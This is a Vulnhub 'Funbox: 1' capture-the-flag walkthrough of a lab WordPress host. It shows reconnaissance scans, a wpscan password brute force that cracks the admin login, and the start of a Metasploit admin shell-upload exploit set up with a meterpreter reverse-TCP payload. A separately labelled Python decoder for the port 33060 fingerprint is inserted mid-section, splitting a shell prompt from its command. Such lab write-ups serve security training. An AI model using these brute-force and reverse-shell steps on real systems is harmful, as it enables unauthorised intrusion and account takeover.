Funbox
Author: jason_huawen
Target machine information
Name: Funbox: 1
Address:
https://www.vulnhub.com/entry/funbox-1,518/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:c7:64:09 1 60 PCS Systemtechnik GmbH
192.168.56.164 08:00:27:a7:af:87 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.164.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.164 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-10 21:17 EST
Nmap scan report for bogon (192.168.56.164)
Host is up (0.00013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry
|_/secret/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=1/10%Time=63BE1C3F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:A7:AF:87 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds
The Nmap scan shows that the target host has four open ports: 21 (FTP), 22 (SSH), 80 (HTTP) and 33060 (mysqlx?).
Getting a shell
Port 21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
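The `mysqlx?` guess for port 33060 can be confirmed from the SF fingerprint nmap printed: the MySQL X Plugin wraps every message in a 4-byte little-endian length (covering the type byte and payload), a type byte and a protobuf body. The following added Python example (not from the original write-up) decodes the two replies recorded in that fingerprint, re-typed here as byte strings: the 9-byte greeting every probe receives, and the 43-byte reply to probes such as SSLSessionReq, which is that greeting followed by an error frame. Message and field numbers follow the Mysqlx protobuf definitions; `SERVER_MSG_TYPES` and `NOTICE_TYPES` hold only the subset needed here.

```python
import struct

# Bytes re-typed from the nmap SF fingerprint above for port 33060 (the page's
# own data): the reply to the NULL probe, and the reply to SSLSessionReq.
NULL_PROBE_REPLY = b"\x05\x00\x00\x00\x0b\x08\x05\x1a\x00"
SSL_PROBE_REPLY = (
    b"\x05\x00\x00\x00\x0b\x08\x05\x1a\x00"
    b"\x1e\x00\x00\x00\x01\x08\x01\x10\x88'\x1a\x0fInvalid message\"\x05HY000"
)

# Server-side message type byte (Mysqlx.ServerMessages.Type), subset used here.
SERVER_MSG_TYPES = {0: "OK", 1: "ERROR", 11: "NOTICE"}
# Mysqlx.Notice.Frame.Type values seen here.
NOTICE_TYPES = {1: "WARNING", 5: "SERVER_HELLO"}


def read_varint(buf, pos):
    """Decode a protobuf base-128 varint at buf[pos]; return (value, next_pos)."""
    value = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7


def parse_protobuf(payload):
    """Walk the protobuf wire format into {field_number: value}. Only varint
    (wire type 0) and length-delimited (wire type 2) fields occur in these
    two messages, so anything else is rejected."""
    fields, pos = {}, 0
    while pos < len(payload):
        key, pos = read_varint(payload, pos)
        field, wire = key >> 3, key & 0x7
        if wire == 0:
            fields[field], pos = read_varint(payload, pos)
        elif wire == 2:
            length, pos = read_varint(payload, pos)
            fields[field] = bytes(payload[pos:pos + length])
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire} in field {field}")
    return fields


def describe(msg_type, fields):
    """Turn one decoded frame into a readable dict using the Mysqlx field numbers."""
    kind = SERVER_MSG_TYPES.get(msg_type, f"UNKNOWN({msg_type})")
    if kind == "ERROR":
        # Mysqlx.Error: 1=severity (0 ERROR, 1 FATAL), 2=code, 3=msg, 4=sql_state
        return {"type": kind, "fatal": fields.get(1) == 1, "code": fields[2],
                "msg": fields[3].decode(), "sql_state": fields[4].decode()}
    if kind == "NOTICE":
        # Mysqlx.Notice.Frame: 1=type, 2=scope, 3=payload
        return {"type": kind, "notice": NOTICE_TYPES.get(fields[1], fields[1]),
                "payload_len": len(fields.get(3, b""))}
    return {"type": kind, "fields": fields}


def parse_frames(raw):
    """Split an X Protocol byte stream into frames: u32 LE length (type byte +
    payload), then the type byte, then the protobuf payload. Raises ValueError
    on a length that does not match the data, which is what non-X services
    produce."""
    frames, pos = [], 0
    while pos < len(raw):
        if len(raw) - pos < 5:
            raise ValueError("truncated frame header")
        length = struct.unpack_from("<I", raw, pos)[0]
        body = raw[pos + 4:pos + 4 + length]
        if len(body) != length:
            raise ValueError(f"frame claims {length} bytes, only {len(body)} present")
        frames.append(describe(body[0], parse_protobuf(body[1:])))
        pos += 4 + length
    return frames


def is_mysqlx(raw):
    """Service check: the X Plugin greets every client with a NOTICE frame
    carrying the ServerHello notice; non-X traffic then gets a fatal ERROR
    5000 'Invalid message' with SQLSTATE HY000, exactly as the fingerprint shows."""
    try:
        frames = parse_frames(raw)
    except (ValueError, KeyError, IndexError):
        return False
    return bool(frames) and frames[0] == {
        "type": "NOTICE", "notice": "SERVER_HELLO", "payload_len": 0}


if __name__ == "__main__":
    for name, reply in (("NULL", NULL_PROBE_REPLY), ("SSLSessionReq", SSL_PROBE_REPLY)):
        print(name, is_mysqlx(reply), parse_frames(reply))
```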
└─$ ftp 192.168.56.164
Connected to 192.168.56.164.
220 ProFTPD Server (Debian) [::ffff:192.168.56.164]
Name (192.168.56.164:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
- The target host does not allow anonymous access;
- The FTP server software is ProFTPD, but the version is unknown.
Port 80
Visiting port 80 in the browser on Kali Linux returns an error; the site redirects to funbox.fritz.box, so add that name to /etc/hosts:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.164 funbox.fritz.box
Reloading the page, the response shows it is a WordPress site.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ curl http://funbox.fritz.box/robots.txt
Disallow: /secret/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ curl http://funbox.fritz.box/secret/
No secrets here. Try harder !
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ nikto -h http://192.168.56.164
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.164
+ Target Hostname: 192.168.56.164
+ Target Port: 80
+ Start Time: 2023-01-10 21:26:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://funbox.fritz.box/
+ Uncommon header 'link' found, with multiple values: (<http://funbox.fritz.box/index.php/wp-json/>; rel="https://api.w.org/",<http://funbox.fritz.box/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Multiple index files found: /index.php, /default.htm
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /secret/: This might be interesting...
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7916 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2023-01-10 21:27:20 (GMT-5) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
nikto found the WordPress admin back end. Before trying wpscan, first scan for any other directories or files that might be useful.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/10 21:28:50 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
/server-status (Status: 403) [Size: 279]
Progress: 220410 / 220561 (99.93%)
===============================================================
2023/01/10 21:29:32 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,js,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/10 21:29:43 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 61294]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
/wp-login.php (Status: 200) [Size: 4502]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
/readme.html (Status: 200) [Size: 7278]
/robots.txt (Status: 200) [Size: 19]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
/server-status (Status: 403) [Size: 279]
Progress: 1322235 / 1323366 (99.91%)
===============================================================
2023/01/10 21:34:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ dirb http://192.168.56.164
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan 10 21:34:37 2023
URL_BASE: http://192.168.56.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.164/ ----
+ http://192.168.56.164/index.php (CODE:200|SIZE:61294)
+ http://192.168.56.164/robots.txt (CODE:200|SIZE:19)
==> DIRECTORY: http://192.168.56.164/secret/
+ http://192.168.56.164/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.164/wp-admin/
==> DIRECTORY: http://192.168.56.164/wp-content/
==> DIRECTORY: http://192.168.56.164/wp-includes/
+ http://192.168.56.164/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.56.164/secret/ ----
+ http://192.168.56.164/secret/index.html (CODE:200|SIZE:30)
---- Entering directory: http://192.168.56.164/wp-admin/ ----
+ http://192.168.56.164/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-admin/css/
==> DIRECTORY: http://192.168.56.164/wp-admin/images/
==> DIRECTORY: http://192.168.56.164/wp-admin/includes/
+ http://192.168.56.164/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-admin/js/
==> DIRECTORY: http://192.168.56.164/wp-admin/maint/
==> DIRECTORY: http://192.168.56.164/wp-admin/network/
==> DIRECTORY: http://192.168.56.164/wp-admin/user/
---- Entering directory: http://192.168.56.164/wp-content/ ----
+ http://192.168.56.164/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-content/plugins/
==> DIRECTORY: http://192.168.56.164/wp-content/themes/
==> DIRECTORY: http://192.168.56.164/wp-content/upgrade/
==> DIRECTORY: http://192.168.56.164/wp-content/uploads/
---- Entering directory: http://192.168.56.164/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/network/ ----
+ http://192.168.56.164/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.164/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-admin/user/ ----
+ http://192.168.56.164/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.164/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/plugins/ ----
+ http://192.168.56.164/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/themes/ ----
+ http://192.168.56.164/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Jan 10 21:34:57 2023
DOWNLOADED: 36896 - FOUND: 14
Neither gobuster nor dirb found any further directories or files of value.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ wpscan --url http://funbox.fritz.box/ -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / | ___/   \___ \ / __|/ _` | '_ \
            \  /\  /  | |       ____) | (__| (_| | | | |
             \/  \/   |_|      |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox.fritz.box/ [192.168.56.164]
[+] Started: Tue Jan 10 21:36:24 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://funbox.fritz.box/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox.fritz.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jan 10 21:36:34 2023
[+] Requests Done: 57
[+] Cached Requests: 8
[+] Data Sent: 14.838 KB
[+] Data Received: 573.9 KB
[+] Memory used: 239.93 MB
[+] Elapsed time: 00:00:09
wpscan found the users admin and joe. Next, see whether admin's password can be cracked.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ wpscan --url http://funbox.fritz.box/ -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / | ___/   \___ \ / __|/ _` | '_ \
            \  /\  /  | |       ____) | (__| (_| | | | |
             \/  \/   |_|      |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox.fritz.box/ [192.168.56.164]
[+] Started: Tue Jan 10 21:36:56 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://funbox.fritz.box/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox.fritz.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / iubire
Trying admin / iubire Time: 00:00:11 < > (665 / 14345057) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: iubire
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jan 10 21:37:24 2023
[+] Requests Done: 806
[+] Cached Requests: 38
[+] Data Sent: 265.434 KB
[+] Data Received: 3.374 MB
[+] Memory used: 287.012 MB
[+] Elapsed time: 00:00:27
Log in to the WordPress back end with the cracked username and password.
When trying to modify the 404 template and clicking Update File, an error is returned:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
So modifying the 404 template is not a viable route; another approach is needed.
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
